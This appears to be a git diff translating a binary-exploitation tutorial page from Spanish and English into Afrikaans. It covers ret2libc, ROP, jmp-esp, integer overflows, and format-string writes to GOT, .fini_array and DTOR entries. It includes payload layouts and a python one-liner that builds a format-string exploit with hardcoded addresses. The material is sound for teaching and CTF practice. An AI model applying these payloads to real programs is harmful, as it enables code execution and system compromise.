system) +"A" \* EBP-AFSTAND + 4 (EBP: dit kan 4 "A"s wees, maar dit is beter as dit die werklike EBP is om segmentasie-foute te voorkom) + Adres van **system** (dit sal die EIP oorskryf) + Adres van **exit** (as system("/bin/sh") klaar is, sal hierdie funksie geroep word omdat die eerste 4 byte van die stapel as die volgende EIP-adres beskou word) + Adres van "**/bin/sh**" (dit sal die parameter wees wat aan system oorgedra word) -De esta forma el EIP se sobreescribirá con la dirección de system la cual recibirá como parámetro el string “/bin/sh” y al salir de este ejecutará la función exit(). +Op hierdie manier sal die EIP oorskryf word met die adres van system wat die string "/bin/sh" as 'n parameter sal ontvang, en wanneer dit klaar is, sal dit die exit()-funksie uitvoer. 
-Es posible encontrarse en la situación de que algún byte de alguna dirección de alguna función sea nulo o espacio (\x20). En ese caso se pueden desensamblar las direcciones anteriores a dicha función pues probablemente haya varios NOPs que nos permitan poder llamar a alguno de ellos en vez de a la función directamente (por ejemplo con > x/8i system-4). +Dit is moontlik dat een byte van 'n adres van 'n funksie nul of spasie (\x20) kan wees. In hierdie geval kan die vorige adresse voor daardie funksie ontleed word, omdat daar waarskynlik verskeie NOP's is wat ons in staat stel om een van hulle te roep in plaas van die funksie self (byvoorbeeld met > x/8i system-4). -Este método funciona pues al llamar a una función como system usando el opcode **ret** en vez de **call**, la función entiende que los primeros 4bytes serán la dirección **EIP** a la que volver. +Hierdie metode werk omdat wanneer 'n funksie soos system geroep word deur die opcode **ret** in plaas van **call** te gebruik, verstaan die funksie dat die eerste 4 byte die **EIP**-adres is waarna teruggekeer moet word. -Una técnica interesante con este método es el llamar a **strncpy()** para mover un payload del stack al heap y posteriormente usar **gets()** para ejecutar dicho payload. +'n Interessante tegniek met hierdie metode is om **strncpy()** te roep om 'n nutlading van die stapel na die heap te skuif en dan **gets()** te gebruik om hierdie nutlading uit te voer. -Otra técnica interesante es el uso de **mprotect()** la cual permite asignar los permisos deseados a cualquier parte de la memoria. Sirve o servía en BDS, MacOS y OpenBSD, pero no en linux(controla que no se puedan otorgar a la vez permisos de escritura y ejecución). Con este ataque se podría volver a configurar la pila como ejecutable. +'n Ander interessante tegniek is die gebruik van **mprotect()**, wat toelaat dat die gewenste toestemmings aan enige deel van die geheue toegewys word. 
Dit werk of het gewerk in BDS, MacOS en OpenBSD, maar nie in Linux (beheer dat skryf- en uitvoerregte nie gelyktydig toegestaan kan word nie). Met hierdie aanval kan die stapel weer as uitvoerbaar ingestel word. -**Encadenamiento de funciones** +**Funksieketting** -Basándonos en la técnica anterior, esta forma de exploit consiste en:\ -Relleno + \&Función1 + \&pop;ret; + \&arg\_fun1 + \&Función2 + \&pop;ret; + \&arg\_fun2 + … +Gebaseer op die vorige tegniek, bestaan hierdie vorm van uitbuiting uit:\ +Vulsel + \&Funksie1 + \&pop;ret; + \&arg\_fun1 + \&Funksie2 + \&pop;ret; + \&arg\_fun2 + ... -De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios (ej 4) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —> **objdump -d ejecutable** +Op hierdie manier kan funksies aanmekaar geketting word om op te roep. As funksies met verskeie argumente gebruik wil word, kan die nodige argumente geplaas word (bv. 4) en die 4 argumente geplaas word en 'n adres soek na 'n plek met opkodes: pop, pop, pop, pop, ret —> **objdump -d uitvoerbare lêer** -**Encadenamiento mediante falseo de frames (encadenamiento de EBPs)** +**Ketting deur vervalsing van rame (EBP-ketting)** -Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret" +Dit behels die gebruik van die vermoë om die EBP te manipuleer om die uitvoering van verskeie funksies deur die EBP en "leave;ret" te ketting. 
-RELLENO +VULSEL -* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) -* En el EIP ponemos de dirección una función &(leave;ret) +* Plaas 'n vals EBP in die EBP wat wys na: 2de vals EBP + die funksie wat uitgevoer moet word: (\&system() + \&leave;ret + &"/bin/sh") +* Plaas 'n funksie &(leave;ret) as die adres in die EIP -Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/sh” +Begin die shellcode met die adres van die volgende deel van die shellcode, bv. 2de vals EBP + \&system() + &(leave;ret;) + &"/bin/sh" -el 2ºEBP sería: 3ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/ls” +Die 2de EBP sal wees: 3de vals EBP + \&system() + &(leave;ret;) + &"/bin/ls" -Esta shellcode se puede repetir indefinidamente en las partes de memoria a las que se tenga acceso de forma que se conseguirá una shellcode fácilmente divisible por pequeños trozos de memoria. +Hierdie shellcode kan oneindig herhaal word in dele van die geheue waar toegang verkry kan word, sodat 'n shellcode maklik in klein stukkies geheue verdeel kan word. -(Se encadena la ejecución de funciones mezclando las vulnerabilidades vistas anteriormente de EBP y de ret2lib) +(Die uitvoering van funksies word geketting deur die vorige EBP- en ret2lib-kwesbaarhede te meng) -## **5.Métodos complementarios** +## **5. Aanvullende metodes** **Ret2Ret** -Útil para cuando no se puede meter una dirección del stack en el EIP (se comprueba que el EIP no contenga 0xbf) o cuando no se puede calcular la ubicación de la shellcode. Pero, la función vulnerable acepte un parámetro (la shellcode irá aquí). +Dit is nuttig wanneer 'n adres van die stapel nie in die EIP geplaas kan word nie (dit word geverifieer dat die EIP nie 0xbf bevat nie) of wanneer die ligging van die shellcode nie bereken kan word nie. 
Maar die kwesbare funksie aanvaar 'n parameter (die shellcode sal hier wees). -De esta forma, al cambiar el EIP por una dirección a un **ret**, se cargará la siguiente dirección (que es la dirección del primer argumento de la función). Es decir, se cargará la shellcode. +Op hierdie manier, deur die EIP te verander na 'n adres van 'n **ret**, sal die volgende adres gelaai word (wat die adres van die eerste argument van die funksie is). Dit beteken dat die shellcode gelaai sal word. -El exploit quedaría: SHELLCODE + Relleno (hasta EIP) + **\&ret** (los siguientes bytes de la pila apuntan al inicio de la shellcode pues se mete en el stack la dirección al parámetro pasado) - -Al parecer funciones como **strncpy** una vez completas eliminan de la pila la dirección donde estaba guardada la shellcode imposibilitando esta técnica. Es decir, la dirección que pasan a la función como argumento (la que guarda la shellcode) es modificada por un 0x00 por lo que al llamar al segundo **ret** se encuentra con un 0x00 y el programa muere. +Die exploit sal lyk as volg: SHELLCODE + Vulsel (tot by EIP) + **\&ret** (die volgende byte van die stapel wys na die begin van die shellcode omdat die adres van die oorgedrae parameter in die stapel geplaas word) +Dit blyk dat funksies soos **strncpy** nadat hulle voltooi is, die adres waar die shellcode gestoor is, uit die stapel verwyder, wat hierdie tegniek onmoontlik maak. Dit beteken dat die adres wat as 'n argument aan die funksie oorgedra word (die een wat die shellcode stoor) gewysig word deur 'n 0x00, sodat wanneer die tweede **ret** geroep word, dit 'n 0x00 kry en die program sterf. ``` - **Ret2PopRet** +**Ret2PopRet** ``` +As ons nie beheer het oor die eerste argument nie, maar wel oor die tweede of derde, kan ons EIP oorskryf met 'n adres na pop-ret of pop-pop-ret, afhangende van wat ons nodig het. 
-Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos. +**Murat se tegniek** -**Técnica de Murat** +In Linux word alle programme gekaart beginnende by 0xbfffffff. -En linux todos los progamas se mapean comenzando en 0xbfffffff +Deur te kyk hoe 'n nuwe proses se stapel in Linux opgebou word, kan 'n uitbuiting ontwikkel word sodat die program in 'n omgewing begin word waarvan die enigste veranderlike die shellcode is. Die adres daarvan kan dan bereken word as: addr = 0xbfffffff - 4 - strlen(VOLLEDIGE\_UITVOERBARE\_NAAM) - strlen(shellcode) -Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen(NOMBRE\_ejecutable\_completo) - strlen(shellcode) +Op hierdie manier kan die adres waar die omgewingsveranderlike met die shellcode is, maklik verkry word. -De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode. +Dit kan gedoen word omdat die execle-funksie 'n omgewing kan skep wat slegs die omgewingsveranderlikes bevat wat gewens word. -Esto se puede hacer gracias a que la función execle permite crear un entorno que solo tenga las variables de entorno que se deseen +**Spring na ESP: Windows-styl** -**Jump to ESP: Windows Style** +Omdat ESP altyd na die begin van die stapel wys, behels hierdie tegniek die vervanging van EIP met 'n adres na 'n oproep na **jmp esp** of **call esp**. Op hierdie manier word die shellcode gestoor na die oorskrywing van EIP, aangesien die ESP na die uitvoering van die **ret** na die volgende adres wys, presies waar die shellcode gestoor is. 
-Debido a que el ESP está apuntando al comienzo del stack siempre, esta técnica consiste con sustituir el EIP con la dirección a una llamada a **jmp esp** o **call esp**. De esta forma, se guarda la shellcode después de la sobreescritura del EIP ya que después de ejecutar el **ret** el ESP se encontrará apuntando a la dirección siguiente, justo donde se ha guardado la shellcode. +As ASLR nie aktief is in Windows of Linux nie, kan **jmp esp** of **call esp** geroep word wat in 'n gedeelde voorwerp gestoor is. As ASLR wel aktief is, kan dit binne die kwesbare program self gesoek word. -En caso de que no se tenga el ASLR activo en Windows o Linux se puede llamar a **jmp esp** o **call esp** almacenadas en algún objeto compartido. En caso de que esté el ASLR, se podría buscar dentro del propio programa vulnerable. +Verder maak die feit dat die shellcode na die oorskrywing van EIP geplaas word in plaas van in die middel van die stapel, dit moontlik dat die push- of pop-instruksies wat in die middel van die funksie uitgevoer word, nie die shellcode raak nie (wat wel kan gebeur as dit in die middel van die stapel van die funksie geplaas word). -Además, el hecho de poder colocar la shellcode después de la corrupción del EIP en vez de en medio del stack, permite que las instrucciones push o pop que se ejecuten en medio de la función no lleguen a tocar la shellcode (cosa que podría ocurrir en caso de ponerse en medio del stack de la función). +Op 'n baie soortgelyke manier kan 'n funksie wat die adres waar die shellcode gestoor is, teruggee, geroep word met **call eax** of **jmp eax (ret2eax).** -De forma muy similar a esto si sabemos que una función devuelve la dirección donde está guardada la shellcode se puede llamar a **call eax** o **jmp eax (ret2eax).** +**ROP (Return Oriented Programming) of geleende kodebrokke** -**ROP (Return Oriented Programming) o borrowed code chunks** +Die stukke kode wat opgeroep word, staan bekend as gadgets. 
-Los trozos de código que se invocan se conocen como gadgets. +Hierdie tegniek behels die koppel van verskillende oproepe na funksies deur die gebruik van die **ret2libc**-tegniek en die gebruik van **pop,ret**. -Esta técnica consiste en encadenar distintas llamadas a funciones mediante la técnica de **ret2libc** y el uso de **pop,ret**. +In sommige prosesseerargitekture is elke instruksie 'n stel van 32-bits (soos MIPS). Tog is instruksies in Intel van veranderlike grootte en verskeie instruksies kan 'n stel bits deel, byvoorbeeld: -En algunas arquitecturas de procesadores cada instrucción es un conjunto de 32bits (MIPS por ej). Sin embargo, en Intel las instrucciones son de tamaño variable y varias instrucciones pueden compartir un conjunto de bits, por ejemplo: +**movl $0xe4ff, -0x(%ebp)** —> Bevat die bytes 0xffe4 wat ook vertaal kan word as: **jmp \*%esp** -**movl $0xe4ff, -0x(%ebp)** —> Contiene los bytes 0xffe4 que también se traducen por: **jmp \*%esp** +Op hierdie manier kan sekere instruksies uitgevoer word wat nie eintlik in die oorspronklike program is nie. -De esta forma se pueden ejecutar algunas instrucciones que realmente ni si quiera está en el programa original +**ROPgadget.py** help ons om waardes in binêre lêers te vind. -**ROPgadget.py** nos ayuda a encontrar valores en binarios +Hierdie program kan ook gebruik word om die **payloads** te skep. Jy kan die biblioteek gee waaruit jy die ROPs wil haal, en dit sal 'n Python-payload genereer wat gereed is om as shellcode gebruik te word. Verder, omdat dit stelseloproepe gebruik, voer dit nie werklik iets uit op die stapel nie, maar hou dit net die adresse van ROPs wat uitgevoer sal word deur middel van **ret**. Om hierdie payload te gebruik, moet die payload geroep word deur 'n **ret**-instruksie. -Este programa también sirve para crear los **payloads**. 
Le puedes dar la librería de la que quieres sacar los ROPs y él generará un payload en python al cual tu le das la dirección en la que está dicha librería y el payload ya está listo para ser usado como shellcode. Además, como usa llamadas al sistema no ejecuta realmente nada en el stack sino que solo va guardando direcciones de ROPs que se ejecutarán mediante **ret**. Para usar este payload hay que llamar al payload mediante una instrucción **ret**. - -**Integer overflows** - -Este tipo de overflows se producen cuando una variable no está preparada para soportar un número tan grande como se le pasa, posiblemente por una confusión entre variables con y sin signo, por ejemplo: +**Integer-oorloop** +Hierdie tipe oorloop vind plaas wanneer 'n veranderlike nie gereed is om 'n so groot getal te hanteer soos wat aan hom oorgedra word nie, moontlik as gevolg van verwarring tussen veranderlikes met en sonder teken, byvoorbeeld: ```c #include #include 
@@ -357,25 +380,23 @@ printf("\nIntento de hack\n"); return 0; } ``` +In die vorige voorbeeld sien ons dat die program 2 parameters verwag. Die eerste is die lengte van die volgende string en die tweede is die string self. -En el ejemplo anterior vemos que el programa se espera 2 parámetros. El primero la longitud de la siguiente cadena y el segundo la cadena. +As ons 'n negatiewe getal as die eerste parameter gee, sal dit sê dat len < 256 en sal ons daardie filter verbykom. Verder sal strlen(buffer) ook kleiner wees as l, omdat l 'n unsigned int is en baie groot sal wees. -Si le pasamos como primer parámetro un número negativo saldrá que len < 256 y pasaremos ese filtro, y además también strlen(buffer) será menor que l, pues l es unsigned int y será muy grande. +Hierdie tipe oorloop probeer nie om iets in die program se proses te skryf nie, maar om sleg ontwerpte filters te omseil om ander kwesbaarhede uit te buit. -Este tipo de overflows no busca lograr escribir algo en el proceso del programa, sino superar filtros mal diseñados para explotar otras vulnerabilidades. +**Ongeïnitialiseerde veranderlikes** -**Variables no inicializadas** +Die waarde van 'n ongeïnitialiseerde veranderlike is onbekend en dit kan interessant wees om dit te ondersoek. Dit kan wees dat dit die waarde aanneem van 'n veranderlike in die vorige funksie en dat dit deur die aanvaller beheer word. -No se sabe el valor que puede tomar una variable no inicializada y podría ser interesante observarlo. Puede ser que tome el valor que tomaba una variable de la función anterior y esta sea controlada por el atacante. +## **Formaat Strings** -## **Format Strings** +In C is **`printf`** 'n funksie wat gebruik kan word om 'n string af te druk. Die **eerste parameter** wat hierdie funksie verwag, is die **rou teks met die formatters**. Die **volgende parameters** wat verwag word, is die **waardes** wat die **formatters** in die rou teks moet **vervang**. 
-In C **`printf`** is function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text. - -The vulnerability appears when an **attacker text is put as the first argument** to this function. The attacker will be able to craft a **special input abusing** the **printf format** string capabilities to **write any data in any address**. Being able this way to **execute arbitrary code**. - -Fomatters: +Die kwesbaarheid ontstaan wanneer 'n **aanvaller se teks as die eerste argument** aan hierdie funksie voorsien word. Die aanvaller sal in staat wees om 'n **spesiale inset te skep deur misbruik te maak van die printf-formaatstring se vermoëns om enige data in enige adres te skryf**. Op hierdie manier kan arbitêre kode uitgevoer word. +Formatters: ```bash %08x —> 8 hex bytes %d —> Entire 
@@ -385,217 +406,200 @@ Fomatters: %hn —> Occupies 2 bytes instead of 4 $X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3 ``` - -**`%n`** **writes** the **number of written bytes** in the **indicated address. Writing** as much **bytes** as the hex number we **need** to write is how you can **write any data**. - +**`%n`** **skryf** die **aantal geskryfde bytes** in die **aangeduide adres. Deur** soveel **bytes** te skryf as die heksgetal wat ons **nodig het** om te skryf, kan jy **enige data skryf**. ```bash AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param AAAA.%500\$08x —> Param at offset 500 ``` +### GOT (Global Offsets Table) / PLT (Procedure Linkage Table) -### GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table) +Dit is die tabel wat die adres bevat van die eksterne funksies wat deur die program gebruik word. -This is the table that contains the **address** to the **external functions** used by the program. - -Get the address to this table with: **`objdump -s -j .got ./exec`** +Kry die adres van hierdie tabel met: **`objdump -s -j .got ./exec`** ![](<../../.gitbook/assets/image (619).png>) -Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT` +Let daarop hoe nadat die uitvoerbare lêer in GEF gelaai is, kan jy die funksies sien wat in die GOT is: `gef➤ x/20x 0xDIR_GOT` -![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png>) +![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png>) -Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: +Met GEF kan jy 'n foutopsporingsessie begin en die `got` 
uitvoer om die got-tabel te sien: ![](<../../.gitbook/assets/image (621).png>) -In a binary the GOT has the **addresses to the functions or** to the **PLT** section that will load the function address. The goal of this exploit is to **override the GOT entry** of a function that is going to be executed later **with** the **address** of the PLT of the **`system`** **function**. Ideally, you will **override** the **GOT** of a **function** that is **going to be called with parameters controlled by you** (so you will be able to control the parameters sent to the system function). +In 'n binêre lêer het die GOT die adresse na die funksies of na die PLT-seksie wat die funksie-adres sal laai. Die doel van hierdie aanval is om die GOT-inskrywing van 'n funksie wat later uitgevoer gaan word, te oorskryf met die adres van die PLT van die `system`-funksie. Ideaal gesproke sal jy die GOT van 'n funksie oorskryf wat geroep gaan word met parameters wat deur jou beheer word (sodat jy die parameters wat na die stelsel-funksie gestuur word, kan beheer). -If **`system`** **isn't used** by the script, the system function **won't** have an entry in the GOT. In this scenario, you will **need to leak first the address** of the `system` function. +As die skripsie nie `system` gebruik nie, sal die stelsel-funksie nie 'n inskrywing in die GOT hê nie. In hierdie scenario sal jy die adres van die `system`-funksie eerste moet uitlek. -**Procedure Linkage Table** is a **read only** table in ELF file that stores all necessary **symbols that need a resolution**. When one of these functions are called the **GOT** will **redirect** the **flow** to the **PLT** so it can **resolve** the **address** of the function and write it on the GOT.\ -Then, the **next time** a call is performed to that address the **function** is **called directly** without needing to resolve it. +Die Procedure Linkage Table is 'n alleenleestabel in die ELF-lêer wat al die nodige simbole stoor wat 'n oplossing benodig. 
Wanneer een van hierdie funksies geroep word, sal die GOT die vloei na die PLT omskakel sodat dit die adres van die funksie kan oplos en dit in die GOT kan skryf.\ +Daarna, die volgende keer as 'n oproep na daardie adres uitgevoer word, word die funksie direk geroep sonder om dit op te los. -You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`** +Jy kan die PLT-adresse sien met **`objdump -j .plt -d ./vuln_binary`** -### **Exploit Flow** +### Exploit Vloei -As explained before the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Ideally we could set the **address to a shellcode** located in a executable section, but highly probable you won't be able to write a shellcode in a executable section.\ -So a different option is to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**. +Soos voorheen verduidelik, is die doel om die adres van 'n funksie in die GOT-tabel te oorskryf wat later geroep gaan word. Ideaal gesproke kan ons die adres na 'n skulpkode stel wat in 'n uitvoerbare seksie geleë is, maar dit is baie waarskynlik dat jy nie 'n skulpkode in 'n uitvoerbare seksie kan skryf nie.\ +Dus 'n ander opsie is om 'n funksie wat sy argumente van die gebruiker ontvang, te oorskryf en dit na die `system`-funksie te verwys. -To write the address, usually 2 steps are done: You **first writes 2Bytes** of the address and then the other 2. To do so **`$hn`** is used. +Om die adres te skryf, word gewoonlik 2 stappe gedoen: Jy skryf **eerstens 2 byte** van die adres en dan die ander 2. Om dit te doen, word **`$hn`** gebruik. 
-**HOB** is called to the 2 higher bytes of the address\ -**LOB** is called to the 2 lower bytes of the address +**HOB** verwys na die 2 hoër byte van die adres\ +**LOB** verwys na die 2 laer byte van die adres -So, because of how format string works you need to **write first the smallest** of \[HOB, LOB] and then the other one. +Dus, as gevolg van hoe formaatstring werk, moet jy **eerstens die kleinste** van \[HOB, LOB] skryf en dan die ander een. -If HOB < LOB\ +As HOB < LOB\ `[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]` -If HOB > LOB\ +As HOB > LOB\ `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]` HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB \`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` -### **Format String Exploit Template** +### Formaatstring Aanval Sjabloon -You an find a **template** to exploit the GOT using format-strings here: +Jy kan 'n sjabloon vind om die GOT te misbruik deur formaatstrings hier: {% content-ref url="format-strings-template.md" %} [format-strings-template.md](format-strings-template.md) {% endcontent-ref %} -### **.fini\_array** - -Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**. +### .fini\_array +Dit is in wese 'n struktuur met funksies wat voor die program klaar uitgevoer word. Dit is interessant as jy jou skulpkode kan roep deur na 'n adres te spring, of in gevalle waar jy weer terug na die hoofprogram moet gaan om die formaatstring 'n tweede keer te misbruik. 
```bash objdump -s -j .fini_array ./greeting ./greeting: file format elf32-i386 Contents of section .fini_array: - 8049934 a0850408 +8049934 a0850408 #Put your address in 0x8049934 ``` +Let wel dat dit **nie** 'n **ewige lus** sal skep nie, omdat wanneer jy terugkeer na die hooffunksie, sal die kanarie dit opmerk, die einde van die stapel mag dalk beskadig wees en die funksie sal nie weer geroep word nie. So met hierdie metode sal jy in staat wees om **1 ekstra uitvoering** van die kwesbaarheid te hê. -Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln. +### **Formaat Strings om Inhoud te Dump** -### **Format Strings to Dump Content** +'n Formaat string kan ook misbruik word om inhoud uit die geheue van die program te **dump**.\ +Byvoorbeeld, in die volgende situasie is daar 'n **plaaslike veranderlike in die stapel wat na 'n vlag wys**. 
As jy **vind** waar in die **geheue** die **wyser** na die **vlag** is, kan jy **printf toegang** tot daardie **adres** maak en die **vlag** druk: -A format string can also be abused to **dump content** from the memory of the program.\ -For example, in the following situation there is a **local variable in the stack pointing to a flag.** If you **find** where in **memory** the **pointer** to the **flag** is, you can make **printf access** that **address** and **print** the **flag**: - -So, flag is in **0xffffcf4c** +So, vlag is in **0xffffcf4c** ![](<../../.gitbook/assets/image (618) (2).png>) -And from the leak you can see the **pointer to the flag** is in the **8th** parameter: +En vanuit die lek kan jy sien dat die **wyser na die vlag** in die **8ste** parameter is: ![](<../../.gitbook/assets/image (623).png>) -So, **accessing** the **8th parameter** you can get the flag: +So, deur die **8ste parameter** te **benader**, kan jy die vlag kry: ![](<../../.gitbook/assets/image (624).png>) -Note that following the **previous exploit** and realising that you can **leak content** you can **set pointers** to **`printf`** to the section where the **executable** is **loaded** and **dump** it **entirely**! +Let daarop dat na die **vorige aanval** en besef dat jy inhoud kan **lek**, kan jy wyers stel na **`printf`** na die afdeling waar die **uitvoerbare lêer** gelaai word en dit **volledig dump**! ### **DTOR** {% hint style="danger" %} -Nowadays is very **weird to find a binary with a dtor section**. +Teenwoordig is dit baie **vreemd om 'n binêre lêer met 'n dtor-afdeling te vind**. 
{% endhint %} -The destructor are functions that are **executed before program finishes**.\ -If you manage to **write** an **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends.\ -Get the address of this section with: - +Die destructor is funksies wat **uitgevoer word voordat die program eindig**.\ +As jy daarin slaag om 'n **adres** na 'n **shellcode** in **`__DTOR_END__`** te skryf, sal dit **uitgevoer word** voordat die programme eindig.\ +Kry die adres van hierdie afdeling met: ```bash objdump -s -j .dtors /exec rabin -s /exec | grep “__DTOR” ``` +Gewoonlik sal jy die **DTOR**-afdeling **tussen** die waardes `ffffffff` en `00000000` vind. So as jy net daardie waardes sien, beteken dit dat daar **geen funksie geregistreer is nie**. Skryf dus die **`00000000`** oor met die **adres** na die **shellcode** om dit uit te voer. -Usually you will find the **DTOR** section **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it. +### **Formaatstrings vir buffer-oorloop** -### **Format Strings to Buffer Overflows** +Die **sprintf-funksie skuif** 'n geformateerde string **na** 'n **veranderlike**. Daarom kan jy die **formattering** van 'n string misbruik om 'n **buffer-oorloop in die veranderlike** waar die inhoud gekopieer word, te veroorsaak.\ +Byvoorbeeld, die payload `%.44xAAAA` sal **44B+"AAAA" in die veranderlike skryf**, wat 'n buffer-oorloop kan veroorsaak. -Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\ -For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow. 
- -### **\_\_atexit Structures** +### **\_\_atexit-Strukture** {% hint style="danger" %} -Nowadays is very **weird to exploit this**. +Teenwoordig is dit baie **vreemd om dit uit te buit**. {% endhint %} -**`atexit()`** is a function to which **other functions are passed as parameters.** These **functions** will be **executed** when executing an **`exit()`** or the **return** of the **main**.\ -If you can **modify** the **address** of any of these **functions** to point to a shellcode for example, you will **gain control** of the **process**, but this is currently more complicated.\ -Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64\_86**.\ -The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector. +**`atexit()`** is 'n funksie waarvolgens **ander funksies as parameters oorgedra word**. Hierdie **funksies** sal **uitgevoer word** wanneer 'n **`exit()`** uitgevoer word of die **terugkeer** van die **hooffunksie**.\ +As jy die **adres** van enige van hierdie **funksies** kan **verander** om na 'n shellcode te verwys, sal jy beheer oor die proses verkry, maar dit is tans meer ingewikkeld.\ +Tans is die **adresse van die funksies** wat uitgevoer moet word, **verskuil** agter verskeie strukture en uiteindelik is die adres waarna dit verwys nie die adresse van die funksies nie, maar is **geënkripteer met XOR** en verskuiwings met 'n **willekeurige sleutel**. 
Dus is hierdie aanvalsvektor tans **nie baie nuttig ten minste op x86** en **x64\_86** nie.\ +Die **enkripsiefunksie** is **`PTR_MANGLE`**. **Ander argitekture** soos m68k, mips32, mips64, aarch64, arm, hppa... **implementeer nie die enkripsie**-funksie nie omdat dit **dieselfde teruggee** as wat as inset ontvang is. Dus kan hierdie argitekture deur hierdie vektor aangeval word. ### **setjmp() & longjmp()** {% hint style="danger" %} -Nowadays is very **weird to exploit this**. +Teenwoordig is dit baie **vreemd om dit uit te buit**. {% endhint %} -**`Setjmp()`** allows to **save** the **context** (the registers)\ -**`longjmp()`** allows to **restore** the **context**.\ -The **saved registers** are: `EBX, ESI, EDI, ESP, EIP, EBP`\ -What happens is that EIP and ESP are passed by the **`PTR_MANGLE`** function, so the **architecture vulnerable to this attack are the same as above**.\ -They are useful for error recovery or interrupts.\ -However, from what I have read, the other registers are not protected, **so if there is a `call ebx`, `call esi` or `call edi`** inside the function being called, control can be taken over. Or you could also modify EBP to modify the ESP. +**`Setjmp()`** maak dit moontlik om die **konteks** (die registers) **te stoor**.\ +**`longjmp()`** maak dit moontlik om die **konteks te herstel**.\ +Die **gestoorde registers** is: `EBX, ESI, EDI, ESP, EIP, EBP`\ +Wat gebeur is dat EIP en ESP deur die **`PTR_MANGLE`**-funksie oorgedra word, sodat die **argitektuur wat vatbaar is vir hierdie aanval dieselfde is as hierbo**.\ +Hulle is nuttig vir foutherstel of onderbrekings.\ +Tog, volgens wat ek gelees het, word die ander registers nie beskerm nie, **dus as daar 'n `call ebx`, `call esi` of `call edi`** binne die funksie wat geroep word, kan beheer oorgeneem word. Of jy kan ook EBP wysig om ESP te wysig. -**VTable y VPTR en C++** +**VTable en VPTR in C++** -Each class has a **Vtable** which is an array of **pointers to methods**. 
+Elke klas het 'n **Vtabel** wat 'n reeks **verwysings na metodes** is. -Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode. +Elke voorwerp van 'n **klas** het 'n **VPtr** wat 'n **verwysing** na die reeks van sy klas is. Die VPtr is deel van die kop van elke voorwerp, so as 'n **oorwritting** van die **VPtr** bereik word, kan dit **verander** word om na 'n dummie-metode te **verwys**, sodat die uitvoering van 'n funksie na die shellcode sal gaan. -## **Medidas preventivas y evasiones** +## **Voorkomende maatreëls en ontduiking** -**ASLR no tan aleatorio** +**ASLR nie so willekeurig nie** -PaX dive el espacio de direcciones del proceso en 3 grupos: +PaX verdeel die adresruimte van die proses in 3 groepe: -Codigo y datos iniciados y no iniciados: .text, .data y .bss —> 16bits de entropia en la variable delta\_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales +Geïnisieerde en nie-geïnisieerde kodes en data: .text, .data en .bss —> 16-bits entropie in die delta\_exec-veranderlike, hierdie veranderlike word willekeurig geïnisieer met elke proses en word by die aanvanklike adresse gevoeg -Memoria asignada por mmap() y libraries compartidas —> 16bits, delta\_mmap +Geheue toegewys deur mmap() en gedeelde biblioteke —> 16-bits, delta\_mmap -El stack —> 24bits, 